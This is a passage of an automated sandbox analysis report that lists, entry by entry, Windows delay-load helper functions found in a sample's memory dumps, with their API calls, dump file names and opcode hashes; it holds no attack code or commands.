              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d935ff79484d8af5ff665994de28910f3c70e5d285c432a58357971aee7c6078
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d935ff79484d8af5ff665994de28910f3c70e5d285c432a58357971aee7c6078
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: af400bfd609b2fae0422e87880b62c86630542142047269783ab7fba4e667be6
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: af400bfd609b2fae0422e87880b62c86630542142047269783ab7fba4e667be6
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 44b9a75d73d568a2a5cb3f9ba1b8bf6822b02343591fc7356e0937cdf7baeb05
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: 44b9a75d73d568a2a5cb3f9ba1b8bf6822b02343591fc7356e0937cdf7baeb05
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e54c3a3a750d7b9b0ffb2395a19c7cda0753781b8ba05035c3e07d50d5b7068b
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: e54c3a3a750d7b9b0ffb2395a19c7cda0753781b8ba05035c3e07d50d5b7068b
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f64204fd980b98251aee1fa46b8413216c1275a385ab2649e43c084f943b1893
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: f64204fd980b98251aee1fa46b8413216c1275a385ab2649e43c084f943b1893
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b31cde621aad2ed589481ac6878e2552f9d1b28fb8cb81f0dd6419fafd95d22c
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: b31cde621aad2ed589481ac6878e2552f9d1b28fb8cb81f0dd6419fafd95d22c
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ea38c25eee3c871b0ca9d0822de6d0d103ec9e62787799c51d2b7a410cbe5dd3
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: ea38c25eee3c871b0ca9d0822de6d0d103ec9e62787799c51d2b7a410cbe5dd3
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d745cfa6b0cdd930268c6e4ece3e8b66de1178168a34dd908e780e09b3b0fada
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d745cfa6b0cdd930268c6e4ece3e8b66de1178168a34dd908e780e09b3b0fada
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d4fa70bf6a4ffb150d8501120e7acdd84333daf352b71a6550853a77b62e58da
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d4fa70bf6a4ffb150d8501120e7acdd84333daf352b71a6550853a77b62e58da
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b41f82f07daaa1bc76e6c8a6c244ae383630828dfee7446473a95649db371b7c
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: b41f82f07daaa1bc76e6c8a6c244ae383630828dfee7446473a95649db371b7c
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 18c4c159bf54fed86bdc122fa35bf0e9556ff484ec738c9ceb67f6fb12cb8229
              • Instruction ID: 642997830eb71e53dbf91ce4bbf9c67f2836a27c025026a7a1be202c8c8e09f5
              • Opcode Fuzzy Hash: 18c4c159bf54fed86bdc122fa35bf0e9556ff484ec738c9ceb67f6fb12cb8229
              • Instruction Fuzzy Hash: 6AA011A22AC0023C3808B203AC03E3A02CCC0C0B2233082BAB00AA0088A8C808080830
              Function 00B9DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 24ea427bf98c016853bb811c45562b5fbf01570c4ad26eb6b0a9ee9c3a25ffbf
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 24ea427bf98c016853bb811c45562b5fbf01570c4ad26eb6b0a9ee9c3a25ffbf
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              Function 00B9DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 540d54aaae50805cf3d7263c5afd443368660bf4723e2aa47a6dc2bd59d7f35f
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 540d54aaae50805cf3d7263c5afd443368660bf4723e2aa47a6dc2bd59d7f35f
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              Function 00B9DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2169e8de2d353d73e315bb61c91e84e15774400cbcc3c78bc48ba6b08ef86a42
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: 2169e8de2d353d73e315bb61c91e84e15774400cbcc3c78bc48ba6b08ef86a42
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              Function 00B9DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: becb68c5d49b614b069ec654564cfa7079bdc607fe336cc087ee1fcd7799182d
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: becb68c5d49b614b069ec654564cfa7079bdc607fe336cc087ee1fcd7799182d
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              Function 00B9DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d5a895d9ce8f0817f323d8e307f0c106e74c6595a449cf34cc95937c06644b94
              • Instruction ID: 6616a1dfa094792f368ded20bedc01bdd3203f77cf63719ff8df3c0b8a322b48
              • Opcode Fuzzy Hash: d5a895d9ce8f0817f323d8e307f0c106e74c6595a449cf34cc95937c06644b94
              • Instruction Fuzzy Hash: 60A011A22AC002BC38083203AC03E3A02CCC0C0B203308ABAB00AA0088A8C808080830
              Function 00B9DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
